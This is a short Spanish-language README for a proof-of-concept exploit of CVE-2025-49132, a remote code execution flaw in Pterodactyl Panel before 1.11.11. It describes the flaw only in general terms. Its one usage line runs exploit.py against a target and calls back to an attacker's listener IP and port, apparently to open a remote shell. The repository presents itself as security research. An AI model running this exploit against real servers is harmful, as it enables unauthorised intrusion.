
Este script explota la vulnerabilidad de Ejecución Remota de Código en Pterodactyl Panel < 1.11.11
Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-49132, una vulnerabilidad de Ejecución Remota de Código (RCE) que afecta a Pterodactyl Panel < 1.11.11 Esta PoC fue desarrollada y probada en un entorno de laboratorio controlado con fines de investigación y educativos.
La vulnerabilidad se origina por una validación insuficiente de la entrada controlada por el usuario en un manejador de peticiones, lo que permite una interacción no deseada con el backend. Bajo ciertas condiciones, esto puede conducir a la ejecución remota de comandos.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>